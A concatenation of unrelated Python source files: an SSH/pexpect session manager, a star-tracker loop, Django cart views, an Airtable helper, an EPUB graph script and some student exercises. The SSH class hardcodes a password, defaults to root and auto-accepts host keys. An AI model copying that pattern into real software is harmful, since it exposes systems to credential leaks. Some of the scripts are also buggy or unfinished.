984,689 | 439298e56eb116dcd735809496ab6d2103d79a37 | """
File Name : sessionManager.py
File Owner : Nabanita Dutta
Description : This files defines the classes and methods for creating,
maintaining and tearing session for remote amd local shell.
History :
Modified By Version Date Description
------------------ ---------- ----- ------------------
"""
"""
Import :
"""
import os
import pexpect
import re
import signal
import string
import types
import sys
#import tempfile
#import threading
import time
import globalVar
"""
CONSTANTS :
"""
# Add the error list to the expected
expList = [pexpect.EOF, pexpect.TIMEOUT]
CTRL_C = '\x03'
"""
Classes :
"""
class SessionManagerException(Exception):
"Generic exception for all sessions. Accepts a string."
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
class SessionManagerCommandError(Exception):
"Error sending or executing a command."
def __repr__(self):
return "The session prompt was not seen in the output."
class SessionManager(object):
"""Abstract base class for session operations. Although the public
methods are implemented, the session specific private methods must
be defined by descendents of SessionManager.
"""
def __init__(self, command, args, prompt, parent=None, timeout=30,context=None ):
"""
Construct a new session by 'connecting' to a command via
pexpect and then doing whatever negotiations are necessary to
establish positive contact.
Arguments:
command -- command or path to command that the session will run
args -- command line options and arguments
prompt -- the prompt that precedes each user input
parent -- the session object that contains the spawned
expect process that this new session will attach to
timeout -- default timeout for expect() calls [30 seconds]
"""
if parent:
self.spawnProc = parent.spawnProc
self.isChild = True
else:
self.isChild = False
self.context = context
self.command = command
self.args = args
self.prompt = prompt
self.sshTimeout = int ( globalVar.sshTimeout)
if (timeout != 0) :
self.sshTimeout = timeout
try:
self._connect()
# sleeping 2 second to give control to other processes
# This is done to resolve EOF problem
time.sleep(2)
# Checking if the spawned process lives. It is observed that the
# spawned process for gen dies because of TIME_WAIT problem
# If the process had died, sleep for 60 secs so that the socket
# is closed or binding is released (BSD implementation)
# Try spawning the process again, this time it should get thru.
if not self.spawnProc.isalive():
time.sleep(60)
self._connect()
except pexpect.EOF:
if self.spawnProc.isalive():
raise SessionManagerException("error starting %s" % command)
else:
self._postConnect()
except Exception, e:
msg = "session error: %s" % e
self.disconnect()
raise e
def issueCommand(self,command, timeout=3, message=None):
"""
Send a command to the process spawned by pexpect and and do
not wait for anything.
This command should not be used unless really necessary
"""
p = self.spawnProc
p.sendline(command)
#self._checkCommandStatus()
# Renamed assertCommand from Command
def assertCommand(self,command, expected=None, timeout=30, message=None):
assertTimeout = int (globalVar.assertTimeout)
if (timeout != 0) :
assertTimeout = timeout
ssh = self.spawnProc
eatPrompt = True
if not expected:
eatPrompt = False
expected = self.prompt
if not message:
message = 'command "%s" timed out waiting for %s' % \
(command, expected)
expList.append(expected)
ssh.sendline(command)
res = ssh.expect(expList, assertTimeout)
if eatPrompt:
ssh.expect(self.prompt, assertTimeout)
if (res != expList.index(expected)):
self._postCheck(res, message)
#try :
# if eatPrompt:
# ssh.expect(self.prompt, timeout)
#except pexpect.TIMEOUT:
# raise SessionManagerException(message)
return ssh.before
def assertOutput(self, expected=None, timeout=5, message=None):
"""
This functionsWait for the expected output from the spawned pexpect process.
This method sends nothing to the process but expects output;
useful in cases where some event other than direct command input
is causing the process to react.
If expect times out or end of file is received an AssertionError will be raised
"""
assertTimeout = int (globalVar.assertTimeout)
if (timeout != 0) :
assertTimeout = timeout
p = self.spawnProc
#If any expected output is specified, append it to the List
if not expected:
expected = self.prompt
expList.append(expected)
if not message :
message = "Expected output %s not received" %expected
# Wait for the output
result = p.expect(expList, assertTimeout)
# If expected is true and the output is not expected, Call the _postCheck function
if (result != expList.index(expected)):
self._postCheck(result, message)
expList.remove(expected)
def filter(self, subcommand, pattern=None, delim=None):
"""
Send a command and return filtered output.
"""
#print "filter command:%s" %subcommand
# Clear the buffer so that the output of the previous command(s) is
# eaten up
clear = False
count = 0
# Changed the code to support delimeter other than '#'
if (not delim):
prompt = self.prompt
else:
prompt = delim
while(clear == False):
res = self.spawnProc.expect([prompt,pexpect.TIMEOUT],.5)
if (res == 1):
clear = True
output = self._sendAndTrim(subcommand,delim)
#self._checkCommandStatus()
return output
def disconnect(self):
"""
Disconnect from the session. If we are a subsession, close
the spawned pexpect process. This method assumes the
subsession has sent whatever commands necessary to end itself,
so we expect an EOF here before the close.
Expect the process to be closing or already closed, which
generates an EOF. Look # for a 2-second timeout also.
If no spawnProc is defined, return quietly so that callers don't
have problems when calling disconnect() more than once.
"""
if not self.spawnProc:
return
ssh = self.spawnProc
try:
ssh.expect([pexpect.EOF], self.sshTimeout)
except OSError,e:
ssh.kill(signal.SIGKILL)
self.cleanUp()
except pexpect.TIMEOUT:
ssh.kill(signal.SIGKILL)
self.cleanUp()
except Exception, exc:
ssh.kill(signal.SIGKILL)
self.cleanUp()
self.cleanUp()
def cleanUp(self):
"""Clean up all the resource created during the session creation"""
self.isConnected=False
self.spawnProc=None
############################################################
# Internal methods below - may be overridden by descendents
############################################################
def _postCheck (self, result, message=None, promptCheck=False):
"""
This function does the error handling for the functions:
assertOutput, assertCommand, filter.
If error is end of file or timeout then AssertionError is raised
with the message.
Arguments:
result : The result of the p.expect command
message : Message to be printed if the command failed
"""
if not message:
message = "Execution of command failed"
if promptCheck :
if (result == expList.index(self.prompt)):
# got a prompt, want to save the prompt chunk so we can use
# it later to trim command output. do this by sending a
# \r and cultivating the bare prompt.
self.spawnProc.sendline("")
self.spawnProc.expect(self.prompt)
self._extractPChunk(self.spawnProc.before)
expList.remove(self.prompt)
# If timeout occured, raise Assertion error
if (result == expList.index(pexpect.TIMEOUT)):
raise AssertionError('TIME OUT : %s '%message)
# If End of file received, raise Assertion error
elif (result == expList.index(pexpect.EOF)):
raise AssertionError('End Of file received: %s '%message)
def _checkCommandStatus(self, lastCommand=False):
"""Get the status of the last command.
"""
p = self.spawnProc
p.sendline('echo $?')
regex = re.compile('^[0-9]+',re.M)
p.expect(regex, 2)
msg = '_checkCommandStatus : Execution of command FAILED'
if lastCommand:
msg = '_checkCommandStatus :Execution of command : "%s" FAILED' %lastCommand
if p.after != '0' and p.after != '99':
raise AssertionError(msg)
def _connect(self):
"""
Run the command or spawn the process that is the basis for the
session. If we are a parent session, then create the new
spawned process. If we are a child, send the command to the
existing subprocess.
"""
if not self.isChild:
msg = "SessionManager._connect: failed to spawn %s, timeout is : %s" % (self.command, self.sshTimeout)
try:
self.spawnProc = pexpect.spawn(self.command,
self.args, self.sshTimeout)
if not self.spawnProc:
raise SessionManagerException(msg)
self._postConnect()
self.isConnected = True
except pexpect.TIMEOUT:
raise SessionManagerException("Timeout while " + msg)
except pexpect.EOF:
raise SessionManagerException("SessionManager._connect :End of File condition while " + msg)
except Exception, exc:
raise SessionManagerException('SessionManager._connect: caught %s' % exc)
else:
cmdline = self.command + ' ' + string.join(self.args,' ')
self.spawnProc.sendline(cmdline)
self.isConnected = True
def _extractPChunk(self, line):
""" Extract the prompt from the program output. This is for
use with (expect) functions that determine end-of-output by
waiting for the command prompt. The problem is that the
prompt (or a piece of it) is left in the output. The
extracted prompt chunk is used later in the trim functions.
"""
chunk = string.split(line,'\n')[1]
self.promptChunk = chunk
def _postConnect(self):
""" Do whatever expect operations necessary to establish
positive contact with the command after connecting. If
overriding in a descendent, this method must set the
promptChunk variable if using the default _sendAndTrim().
"""
p = self.spawnProc
msg = "SessionManager._postConnect: failed to get prompt"
expList.append(self.prompt)
match = p.expect(expList, self.sshTimeout)
self._postCheck(match,msg,True)
def _sendAndTrim(self, command, delim=None):
"""
General-purpose method that will send the command and trim
the prompt from the output.
"""
assertTimeout = int (globalVar.assertTimeout)
p = self.spawnProc
p.sendline(command)
a=p.readline()
#print a
if (not delim):
prompt = self.prompt
else:
prompt = delim
expList.append(prompt)
result = p.expect(expList,assertTimeout)
if (result != 2) :
self._postCheck(result)
# at this point, we have the output but also the command and
# part of the prompt. get rid of the prompt chunk.
if (not delim):
promptChunk = self.promptChunk
else:
promptChunk = delim
output = re.sub(promptChunk, '', p.before)
output = re.sub(command+'\r\n', '', output)
return output
class SSH(SessionManager):
"""Set up an SSH session.
Note that brackets ("[", "]") are NOT ALLOWED in the prompt string
on the target host. Brackets will screw up the trim functions
because they are list operators in Python. Beware of any other
characters in the prompt that might confuse this class.
The first argument should be in the format login@ip.
The prompt MUST end with '$' or '#', followed by a space. This is a
typical default for most shells, except maybe the C-shell varieties,
which are not endorsed by The Creator."""
def __init__(self, args, parent=None,ctxt=None):
if not args: args = []
if type(args) is types.StringType:
# Code added for checking if the login
# arguments are of the type "user@<remoteip>"
# if not then by default the user is taken as "root"
# and the login arguments become "root@<ip>
#Added by ND
# Commented by Akanksha
# While loggin in to the local shell this isnt provided
# Remove this or add better handling
#logindetails = args.split("@")
#self.ipaddr = logindetails[1]
args = [args]
if (args[0].find('@') == -1):
user = "root"
login = user + '@' + args[0]
args[0] = login
self.longComand = None
super(SSH, self).__init__("ssh", args, "[#$] ", parent,context=ctxt)
def disconnect(self):
"""Send an exit to the remote shell and give it a chance to
finish up before calling the parent disconnect, which closes
the pexpect subprocess."""
p = self.spawnProc
p.sendline("exit")
super(SSH, self).disconnect()
def runLong(self, command):
"""Run a command that is expected to run for a long time,
like 'tail -f'."""
self.longCommand = command
self.spawnProc.sendline(command)
def stopLong(self, reject=False):
"""Stop a command started by runLongCmd.
Returns any output generated by the command or a timeout
string. If reject is true, bail out after the command is
stopped.
TODO The '^C' string does not occur in terminal output on
TODO Linux, therefore the regex substitution will fail to find
TODO a match and you'll get the prompt in the output. This can
TODO be fixed for Linux by doing a uname check and modifying
TODO the trailingJunk string accordingly.
TODO The output is not completely clean. Tests have shown a
TODO leading space and a trailing newline. Callers can
TODO strip() the output, so not a high priority. Caveat
TODO emptor!
"""
if self.longCommand:
p = self.spawnProc
#print 'stopLong: sending ctrl-c'
p.send(CTRL_C)
match = p.expect([self.prompt,
pexpect.TIMEOUT], 2)
if match == 0:
if reject: return
trailingJunk = '\^C' + '\r\n' + self.promptChunk
output = re.sub(self.longCommand+'\r\n', '', p.before)
output = re.sub(trailingJunk, '', output)
return output
else:
return "timed out"
def _postConnect(self):
"""
This function performs the error checking for the ssh specific
connections.
The matching of the prompt received when ssh command is executed is done against
different pexpect error conditions.
Exceptions are raised based on the error condition of SSH connection scenarios.
"""
#timeout = 5
p = self.spawnProc
list = [self.prompt,"ssh:", "[Pp]assword: ", "\? ",
"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@",
pexpect.EOF,pexpect.TIMEOUT]
match = p.expect(list,self.sshTimeout )
#prompt
if (match == list.index(self.prompt)) :
# got a prompt, want to save the prompt chunk so we can use
# it later to trim command output. do this by sending a
# \r and cultivating the bare prompt.
p.sendline("")
p.expect(self.prompt)
self._extractPChunk(p.before)
# ssh error message
elif (match == list.index("ssh:")):
# TODO: send the ssh error text in the exception
msg = "Error occured while executing ssh command "
raise SessionManagerException,msg
# passwd prompt
elif match == 2:
msg = "ssh command got 'Password:' prompt,"
p.sendline("shipped!!")
try:
p.expect(self.prompt,self.sshTimeout)
self._extractPChunk(p.before)
except pexpect.TIMEOUT:
print msg
raise SessionManagerException,msg
# connect confirmation prompt
elif match == 3:
p.sendline("yes")
p.expect(list[2])
p.sendline("shipped!!")
try:
p.expect(self.prompt,self.sshTimeout)
self._extractPChunk(p.before)
except pexpect.TIMEOUT:
msg = "ssh login confirmation problem"
msg = msg + " Key exchange not successful "
print msg
raise SessionManagerException,msg
self._extractPChunk(p.before)
# Remote host identification change
elif match == 4:
msg = "Remote host identification change: check ~/.ssh/known_hosts file"
raise SessionManagerException, msg
# Unexpected Prompt while trying to connect
elif match == 5:
msg = "ssh got unexpected prompt, did not establish connection"
raise SessionManagerException, msg
# Timeout Error
elif (match == list.index(pexpect.TIMEOUT)):
msg = 'ssh to %s timed out' % self.args
raise SessionManagerException, msg
class LocalShell(SessionManager):
"""This class sets up a local shell session.
The prompt MUST end with '$' or '#', followed by a space. This is a
typical default for most shells, except maybe the C-shell varieties,
which are not endorsed by The Creator.
"""
def __init__(self):
super(LocalShell, self).__init__('bash', [], '[#$] ', None, context=None)
def disconnect(self):
"""Send an exit to the remote shell and give it a chance to
finish up before calling the parent disconnect, which closes
the pexpect subprocess."""
self.spawnProc.sendline("exit")
super(LocalShell, self).disconnect()
def waitForLongMessage(self, message):
""" Waits for a message in runLong command and returns the index of the output"""
index = self.spawnProc.expect([message, pexpect.TIMEOUT, pexpect.EOF], 65)
return index
import unittest
class TestSSH(unittest.TestCase):
def testSSHRemote(self):
return
self.ip = 'root@172.16.45.25'
s = SSH(self.ip)
print "Connected"
print "Testing commands"
s.assertCommand("ifconfig")
o = s.filter("ls -ltr")
#print o
s.issueCommand("ls")
s.assertCommand("ls","# ")
#s.assertOutput(":~ ")
time.sleep(2)
s.runLong("tail -f /tmp/gltest-debug.log")
time.sleep(2)
s.stopLong()
s.disconnect()
return
def testNoUser(self):
"Connect with local shell"
return
pass
s = LocalShell()
s.assertCommand("mkdir abc")
o = s.filter("ls -ltr abc")
s.issueCommand("rm -r abc")
print o
s.disconnect()
def testNoSshKeyUser(self):
"Connect with local shell"
return
pass
self.ip = '172.16.45.215'
s = SSH(self.ip)
s.disconnect()
def testLocalShell(self):
"Connect with local shell"
s = LocalShell()
print "Test Filter command:"
print s.filter("ls -ltr")
print "Test Filter command:"
#s.filter("sudo /usr/sbin/asterisk -c",delim='CLI>')
#s.filter("stop gracefully")
#def testSSHRemote(self):
# self.ip = 'root@172.16.43.129'
# s = SSH(self.ip)
# s.disconnect()
#def testSSHRemote(self):
# self.ip = 'root@172.16.43.109'
# s = SSH(self.ip)
# s.disconnect()
if __name__ == '__main__':
startLogger ('DEBUG')
unittest.main()
|
984,690 | f19cb3023d4602ba2791a508697a3721189cde18 | import os
from os import system
from time import sleep, time
import socket
import math
from math import sin, cos
from socket import error as socket_error
import errno
import sys
import cv2
import numpy as np
from fractions import Fraction
import startracker
import beast
import ctypes
import serial
import struct
###### when taking actual pictures, uncomment the code below #######
#import picamera
#from cam import set_camera_specs, take_picture
####################################################################
os.system("pwd")
file_path = sys.argv[1]
CONFIGFILE = sys.argv[2]
YEAR = float(sys.argv[3])
MEDIAN_IMAGE = cv2.imread(sys.argv[4])
command = sys.argv[6]
num_stars = int(sys.argv[7])
my_star_db = startracker.set_up(CONFIGFILE, YEAR)
COM_Port = serial.Serial("/dev/ttyS0", baudrate=9600, bytesize =8,parity = 'N', stopbits =1,timeout=300) #open serial port
file_type = ".bmp"
pic_num = 0
start = time()
###### when taking actual pictures, uncomment the code below #######
#camera = picamera.PiCamera()
#set_camera_specs(camera,False)
####################################################################
success_count = 0
total_count = 0
# don't need a star text file anymore
#stars_text_file = sys.argv[5] # text file name with lastest star position data (put a text file and argv in unit_test.sh for it)
stars = None # latest constellation
# Loop awaiting input
while True:
before_time = time()
sleep(0.001) # allows CPU to get ready for next image
solved = False
pic_num = pic_num + 1 # cannot read last image
image_name = file_path + "/test" + str(pic_num) + file_type # define image name in while loop instead of outside so we can save all pictures
###### when taking actual pictures, uncomment the code below #######
image_text = file_path + "/test" + str(pic_num-1) + ".txt" # text file name with useful data (still working on not getting the last image)
text_file = open(image_text,"w+") # create a text file to write to
before_capture_time = time()
#take_picture(camera, image_name)
after_capture_time = time()
####################################################################
if not os.path.exists(image_name):
print("No picture")
command = "quit"
if command == "quit":
print("Qutting OpenStartracker")
break
elif command == "track" or command == "lis":
print("pic_num = " + str(pic_num))
data = image_name.strip() # Remove stray whitespace
before_process_time = time()
my_reply = startracker.solve_image(file_path, data, pic_num, MEDIAN_IMAGE, my_star_db, stars, num_stars) # solve the image
after_process_time = time()
total_count += 1
if type(my_reply) is tuple: # if the image was solved, this will be true
new_stars = my_reply[1]
stars = new_stars
reply = my_reply[0]
reply = [x.strip() for x in reply.split(';')]
solved = True
print("Quaternian: " + reply[0]) # print the quaternion (this will also need to be returned to the calling function)
q1 = float(reply[4])
q2 = float(reply[5])
q3 = float(reply[6])
q4 = float(reply[7])
#print(time())
my_star_string = ""
for i in range(len(new_stars)):
if my_star_string is not "":
my_star_string += ","
my_star_string+="("+str(new_stars[i][0])+","+str(new_stars[i][1])+")"
#stars_text = open(stars_text_file,"w") # open the stars.txt file to write to
#stars_text.write(my_star_string)
##stars_text.close()
#print(time())
q = "Quaternian: " + str(reply[0])
DEC = "DEC: " + str(reply[1])
RA = "RA: " + str(reply[2])
ORI = "ORI: " + str(reply[3])
DEC1 = float(reply[1])
RA1 = float(reply[2])
ORI1 = float(reply[3])
text_file.write(q+"\n")
text_file.write(DEC+"\n")
text_file.write(RA+"\n")
text_file.write(ORI+"\n")
text_file.write("Stars: "+my_star_string+"\n")
############################ RS485 Code
#print('creating serial command')
#data = ctypes.create_string_buffer(28)
#struct.pack_into('ffffffff',data,0,DEC,RA,ORI,QUA1,QUA2,QUA3,QUA4,time)
#struct.pack_into('fffffff',data,0,q1,q2,q3,q4,DEC1,RA1,ORI1)
#print('sending serial command')
#COM_Port.write(data)
######################################
#print(time())
success_count += 1
if command == "lis": # if running lost in space mode, the mode is complete
##print("position found :)")
# return reply[0] <- this is the quaternian that is found from lis mode
break
else:
# if the track fails to solve an image, don't crop next image
stars = None
print(my_reply.strip())
success_per = (float(success_count)/float(total_count)) * 100
success_per = round(success_per,2)
print("success rate: " + str(success_per))
print("fail rate: " + str(100-success_per))
after_time = time()
capture_time = after_capture_time - before_capture_time
process_time = after_process_time - before_process_time
total_time = after_time - before_time
text_file.write("Capture Time: "+str(capture_time)+"\n")
text_file.write("Processing Time: "+str(process_time)+"\n")
text_file.write("Total Time: " + str(total_time) + "\n")
print("Capture Time: "+str(capture_time))
print("Processing Time: "+str(process_time))
print("Total Time: "+str(total_time)+"\n")
#stars_text.close()
text_file.close()
COM_Port.close()
|
984,691 | 5482f62d157f9d5656f09ae7dbb10243096e0ff7 | person = {
'first_name': 'Tony',
'last_name': 'Macaroni',
'age': 29
}
print('first_name in person?', 'first_name' in person)
print('Tony in person?', 'Tony' in person)
|
984,692 | 70f13183249cf55c4c721e971e455cdd07e1e907 | import random
res_path = "/home/swante/downloads/"
test_lines = [line.strip() for line in open(res_path + "input.txt")]
random.seed(1)
def input():
global test_lines
res = test_lines[0]
test_lines = test_lines[1:]
return res
# =======================
import sys, math, fractions
possible, impossible = "POSSIBLE", "IMPOSSIBLE"
output_test_id = 1
out_file = open(res_path + "output.txt", "w")
def case_print(s):
global output_test_id
# print("Case #{}: {}".format(output_test_id, s))
out_file.write(f"{s}\n")
print(s)
output_test_id += 1
def print_flush(s):
print(s)
sys.stdout.flush()
# ****************************
def solve_one_test_case():
a,b = map(int, input().split())
return a+b
def mymain():
t = int(input())
for _ in range(t):
case_print(solve_one_test_case())
mymain()
|
984,693 | 069aa472db40e03188d2b3a20b4723849dc2e2bf | import datetime
import logging
import os
import time
from typing import List
import dotenv
import requests
from utils import hyphenate_citizen_id
dotenv.load_dotenv()
AIRTABLE_API_KEY = os.environ.get('AIRTABLE_API_KEY')
AIRTABLE_BASE_ID = os.environ.get('AIRTABLE_BASE_ID')
AIRTABLE_TABLE_NAME = "Care%20Requests"
AIRTABLE_BASE_URL = f"https://api.airtable.com/v0/{AIRTABLE_BASE_ID}/{AIRTABLE_TABLE_NAME}"
AIRTABLE_AUTH_HEADER = {"Authorization": f"Bearer {AIRTABLE_API_KEY}"}
AIRTABLE_REQUEST_DELAY = 0.5
def build_airtable_formula_chain(formula: str, expressions: List[str]) -> str:
if len(expressions) == 0:
return ''
if len(expressions) == 1:
return expressions[0]
return f"{formula}({expressions[0]},{build_airtable_formula_chain(formula, expressions[1:])})"
def build_airtable_datetime_expression(_datetime: datetime.datetime,
timezone: datetime.timezone,
unit_specifier: str = "ms") -> str:
# Check logic if datetime is aware from
# https://docs.python.org/3/library/datetime.html#determining-if-an-object-is-aware-or-naive
if _datetime.tzinfo is None or _datetime.tzinfo.utcoffset(_datetime) is None:
_datetime = _datetime.replace(tzinfo=timezone)
return f"DATETIME_PARSE(\"{_datetime.strftime('%Y %m %d %H %M %S %z')}\",\"YYYY MM DD HH mm ss ZZ\",\"ms\")"
def get_airtable_records(params) -> List:
response = requests.get(AIRTABLE_BASE_URL, headers=AIRTABLE_AUTH_HEADER, params=params)
if response.status_code != requests.codes.OK:
raise ConnectionError(f'Unable to retrieve data from Airtable: Error HTTP{response.status_code}.')
results = response.json()
records = results.get('records', [])
# Loop to handle multi-page query
while results.get('offset'):
time.sleep(AIRTABLE_REQUEST_DELAY)
response = requests.get(
AIRTABLE_BASE_URL,
headers=AIRTABLE_AUTH_HEADER,
params={'offset': results.get('offset')})
logging.warn(
f'Executing multi-page query... ' +
f'Currently on page {len(records) // 100}. Got {len(records)} records so far.')
results = response.json()
records += results['records']
return records
def get_citizen_id_matched_airtable_records(citizen_ids: List[str]) -> List:
RECORDS_PER_REQUEST = 100
matched_records = []
for i in range(0, len(citizen_ids), RECORDS_PER_REQUEST):
citizen_id_filter_str = build_airtable_formula_chain('OR', list(set(
map(lambda citizen_id: f"{{Citizen ID}}=\"{hyphenate_citizen_id(citizen_id)}\"",
citizen_ids[i:i + RECORDS_PER_REQUEST]))))
datetime_expression = build_airtable_datetime_expression(datetime.datetime.now().astimezone(
datetime.timezone(datetime.timedelta(hours=7))),
datetime.timezone(datetime.timedelta(hours=7)), unit_specifier='d')
params = [
('fields[]', 'Citizen ID'),
('fields[]', 'Care Status'),
('fields[]', 'Care Provider Name'),
('fields[]', 'Note'),
('filterByFormula', build_airtable_formula_chain('AND', [
citizen_id_filter_str,
# Rejecting to update requests older than 21 days
f"DATETIME_DIFF({datetime_expression}," +
'{Request Datetime}) > 21',
'{Status}="FINISHED"'
])),
('sort[0][field]', 'Request Datetime'),
('sort[0][direction]', 'asc'),
]
records = get_airtable_records(params=params)
matched_records += records
return matched_records
|
984,694 | 97e7a7b64415a382384e01e61eb2add5b94dedf0 | from django.shortcuts import render
from django.shortcuts import get_object_or_404
from catalog.models import Product
from .cart import Cart
from django.http import HttpResponse
import json
def cart_add(request):
cart = Cart(request)
product_id = request.GET.get('product_id', None)
product = Product.objects.get(id=product_id)
response_data = {}
try:
cart.add(product=product)
response_data['added'] = True
response_data['message'] = 'Товар успішно додано в корзину'
except:
response_data['added'] = False
response_data['message'] = "Помилка. Не вдалося додати до кошику."
return HttpResponse(json.dumps(response_data), content_type="application/json")
def cart_remove(request):
product_id = request.GET.get('product_id', None)
cart = Cart(request)
product = get_object_or_404(Product, id=product_id)
response_data = {}
try:
cart.remove(product)
response_data['deleted'] = True
except:
response_data['deleted'] = False
return HttpResponse(json.dumps(response_data), content_type="application/json")
def cart_change_quantity(request):
cart = Cart(request)
product_id = request.GET.get('product_id', None)
product = Product.objects.get(id=product_id)
response_data = {}
if request.GET.get('quantity'):
quantity = request.GET.get('quantity')
try:
cart.set_quantity(product=product, quantity=quantity)
response_data['changed'] = True
except:
response_data['changed'] = False
else:
response_data['changed'] = False
return HttpResponse(json.dumps(response_data), content_type="application/json")
|
984,695 | 2692ad6e5904438d7e6048e383ed2158f15fdff5 | from pprint import pprint
import json
projects_map = {}
class Project:
def __init__(self, val):
super().__init__()
self.val = val
self.neighbours = []
self.dependencies = 0
def add_dependency(self, project):
self.neighbours.append(project)
project.increaseDependencies()
def increaseDependencies(self):
self.dependencies += 1
def decrementDependencies(self):
self.dependencies -= 1
def __repr__(self):
return json.dumps({
'root' : self.val,
#'neighbours' : self.neighbours,
'dependencies' : self.dependencies
})
def __str__(self):
return json.dumps({
'root' : self.val,
#'neighbours' : self.neighbours,
'dependencies' : self.dependencies
})
def addNonDependent(order, offset, projects):
for p in projects:
if p.dependencies == 0:
order[offset] = p
offset += 1
return offset, order
def build_project(projects):
# keep 2 pointers
# 1 pointer to keep track of where to put the data and
# another pointer to point to from where to start processing
order = [None]*len(projects)
end = 0
to_be_processed = 0
end, order = addNonDependent(order, end, projects)
while to_be_processed < end:
current_project = order[to_be_processed]
if current_project is None:
return None
neighbours = current_project.neighbours
for neighbour in neighbours:
neighbour.decrementDependencies()
end, order = addNonDependent(order, end, neighbours)
to_be_processed += 1
print(order)
def get_or_create_project(project_name):
if project_name not in projects_map:
projects_map[project_name] = Project(project_name)
return projects_map[project_name]
def main(projects, dependencies):
for p in projects:
get_or_create_project(p)
for dependency in dependencies:
from_node = get_or_create_project(dependency[0])
to_node = get_or_create_project(dependency[1])
from_node.add_dependency(to_node)
pprint(projects_map)
build_project(projects_map.values())
nodes = ['a', 'b', 'c', 'd', 'e', 'f']
dependencies = [('a', 'd'), ('f', 'b'), ('b', 'd'), ('f', 'a'), ('d', 'c')]
# idea is to build the projects which do not have any incoming dependencies.
# After building the projects mark the incoming nodes as null on the dependent projects
if __name__ == '__main__':
main(nodes, dependencies)
|
984,696 | f6d473411fd4f9f6cf638c20b193478dbeb8564e | # Generated by Django 2.2.6 on 2019-10-28 14:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('sport', '0002_auto_20191028_1414'),
]
operations = [
migrations.RemoveField(
model_name='sportsman',
name='gym_name',
),
]
|
984,697 | cdfca714634519f51b9a6bc4fcd64035829f6954 | from .decode import decode
from .splice import Splice
from .stream import Stream
|
984,698 | cbb58be457aae937cb2af13dbd85694e1d166389 | #!/usr/bin/python
"""
Print the directed network graph for a given EPUB ebook.
The output, printed to stdout, is in graphviz (dot) format.
The nodes are the spine items, identified by their manifest id.
The black arcs are direct links between content documents,
the red arcs show the spine progression.
"""
# standard modules
import bs4
import os
import sys
# yael modules
# TODO find a better way to do this
PROJECT_DIRECTORY = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0]))))
sys.path.append(PROJECT_DIRECTORY)
from yael import Parsing
from yael import Publication
import yael.util
__author__ = "Alberto Pettarin"
__copyright__ = "Copyright 2015, Alberto Pettarin (www.albertopettarin.it)"
__license__ = "MIT"
__version__ = "0.0.9"
__email__ = "alberto@albertopettarin.it"
__status__ = "Development"
def usage():
print("")
print("$ ./%s path/to/dir [--no-spine] > path/to/out.gv" % sys.argv[0])
print("$ ./%s path/to/file.epub [--no-spine] > path/to/out.gv" % sys.argv[0])
print("")
def main():
if len(sys.argv) > 1:
# read from file.epub or uncompressed dir
# parsing MO is not necessary
ebook = Publication(
path=sys.argv[1],
parsing_options=[Parsing.NO_MEDIA_OVERLAY])
else:
# no arguments => print usage
usage()
return
# shall we add the arcs showing the spine progression?
add_spine = True
if (len(sys.argv) > 2) and (sys.argv[2] == "--no-spine"):
add_spine = False
# arc accumulator
arcs = []
# shortcuts
pac_document = ebook.container.default_rendition.pac_document
manifest = pac_document.manifest
spine = pac_document.spine.itemrefs
# for each item in the spine...
for itemref in spine:
item = manifest.item_by_id(itemref.v_idref)
if item != None:
i_p_item = item.asset.internal_path
try:
# ...read the item contents and try to load it
# as a tag soup using BeautifulSoup...
soup = bs4.BeautifulSoup(item.contents)
# ... finding all the <a> elements...
for link in soup.find_all('a'):
# ... that have an href attribute
target_href = link.get('href')
if (
(target_href != None) and
(not target_href.startswith("http"))):
# get the internal path of the target file,
# removing the #fragment, if any
i_p_target = yael.util.norm_join_parent(
i_p_item,
target_href.split("#")[0])
# get the manifest id of the target file
target = manifest.item_by_internal_path(i_p_target)
if target != None:
arcs.append([item.v_id, target.v_id, "link"])
except:
pass
if add_spine:
for i in range(len(spine)):
if i+1 < len(spine):
item = pac_document.manifest.item_by_id(spine[i].v_idref)
target = pac_document.manifest.item_by_id(spine[i+1].v_idref)
arcs.append([item.v_id, target.v_id, "spine"])
# output to stdout in Graphviz (dot) format
# use redirection to save to file, i.e.:
#
# digraph book {
# "a" -> "b";
# "b" -> "a";
# "b" -> "c";
# "c" -> "b";
# "a" -> "b" [color=red];
# }
#
# TODO one might want to output a similar graph
# showing referenced assets (images, audio, etc.),
# not just <a> links
# TODO mark linear="no" nodes with a special symbol
# TODO remove/compact/weight duplicate arcs
#
print("digraph book {")
for arc in arcs:
if arc[2] == "link":
color = ""
else:
color = " [color=red]"
print('"%s" -> "%s"%s;' % (arc[0], arc[1], color))
print("}")
if __name__ == '__main__':
main()
|
984,699 | 46c71974aaf549d8119b61ae9d3e973f6ab95ecb | # Criar objeto do submarino com atributos de posição:
# Criar movimentos
# Se movimento for igual a 'R', então some 1 ao x
# movimento = input
# movimento dividir por letras
# loop for letras com as funicções de movimento
#Class submarine, with position parameters
class Submarino:
def __init__(self, x=False, y=False, z=False, direction=False):
self.x, self.y, self.z, self.direction = int(x),int(y), int(z), str(direction)
self.x, self.y, self.z, self.direction = 0, 0, 0, 'NORTE'
command = 'LLMLRMMUMUD'
direction_list = ['NORTE','LESTE','SUL','OESTE']
def getPrevNext(l,no):
i = l.index(no)
return[l[i - 1]]
print(getPrevNext(direction_list, 'NORTE'))
direction_list = ['NORTE','LESTE','SUL','OESTE']
def get_previous_direction(direction_list, current_direction_position):
i = direction_list.index(current_direction_position)
return [direction_list[i - 1]]
print(get_previous_direction(direction_list, 'NORTE'))
def get_next_direction(direction_list, current_direction_position):
i = direction_list.index(current_direction_position)
return[direction_list[(i + 1) % len(direction_list)]]
print (get_next_direction(direction_list, 'NORTE'))
# Receive command and split it into a list
def command_func():
command = input('Insira o comando para o submarino: ')
def split(command):
return [char for char in command]
split(command)
return split(command)
command_func()
command = command_func()
command
split(command)
# Print Submarine class initial position
vars(Submarino())
# Print first submarine initial position
submarino = Submarino()
print(f'Posição inicial do submarino: {submarino.x} {submarino.y} {submarino.z} {submarino.direction}')
#############################################
class DecoratorExample:
""" Example Class """
def __init__(self):
""" Example Setup """
print('Hello, World!')
self.name = 'Decorator_Example'
def example_function(self):
""" This method is an instance method! """
print('I\'m an instance method!')
print('My name is ' + self.name)
de = DecoratorExample()
de.example_function()
# def moviment():
# x_mov = x + x_mov
# x_mov = x + x_mov
# x_mov = x + x_mov
# direction_mov =
# x = 1
#############################################
#Split comand string into chars in a list
